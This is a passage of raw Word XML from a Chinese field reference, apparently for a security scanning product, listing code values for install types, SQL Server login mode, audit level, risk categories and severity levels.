          <w:p w14:paraId="68DF66BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7558EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D4DA368" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C3BEAFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31B29280" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AAB00E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>java安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2842EE5A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2682CDA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0318900F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="605B43BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>system安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2ABEB5C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="547" w:name="_Toc115166346"/>
      <w:bookmarkStart w:id="548" w:name="windows-sql-server身份验证"/>
      <w:bookmarkEnd w:id="546"/>
      <w:r>
        <w:t>windows SQL Server身份验证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="547"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1291"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="1907893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14F9CC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163D8AAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51FE04B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59535EF3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5128E22B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287972E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5638BA63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Windows模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FF3EC29" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6E7B33" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F793516" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07F653A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和Windows模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BB7A71B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="549" w:name="_Toc115166347"/>
      <w:bookmarkStart w:id="550" w:name="windows-sql-server审核级别"/>
      <w:bookmarkEnd w:id="548"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows SQL Server审核级别</w:t>
      </w:r>
      <w:bookmarkEnd w:id="549"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1204"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A5BDB6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F9271D9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60269721" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4380AC39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AD4E888" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70FBD574" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0838AC58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01386059" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5F8D4979" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04E99E13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1161F6E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7648BD26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅限成功的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07E0DD31" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A488BBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C2590E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2834AD16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅限失败的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="329250EB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58925D1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>auditLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="020B2A35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="015EF2B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>失败和成功的登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32370A34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="551" w:name="_Toc115166348"/>
      <w:bookmarkStart w:id="552" w:name="风险类型"/>
      <w:bookmarkEnd w:id="550"/>
      <w:r>
        <w:t>风险类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="551"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="809"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1201"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="09466BE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48F347D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04DD551A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A166C52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D44BD04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA5700D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EC89057" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F564FEA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2925C5A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="311429C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D93A3A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53F99714" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>对外访问性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0B781217" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="291BE338" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE8AF7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52A12793" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安全配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4604DE19" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185AAE1C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D63306" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="597058A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>POC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EBACBA6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43C9351B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1907265A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4257007E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5CDA8DB5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F236C07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF448C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12979923" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>系统风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="326A95CE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477B4939" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FB4DBD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38626933" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>账号风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E01D63B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="553" w:name="_Toc115166349"/>
      <w:bookmarkStart w:id="554" w:name="危险程度"/>
      <w:bookmarkEnd w:id="552"/>
      <w:r>
        <w:t>危险程度</w:t>
      </w:r>
      <w:bookmarkEnd w:id="553"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="951"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="11A4ECF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7845977" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B6927BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C263AA6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F9EA7BA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F23808A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="100732E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F38C306" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0764D87A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44956FCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33EECE29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B67C7B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>低危</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2AFC7D68" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D16782" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="767CBFFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
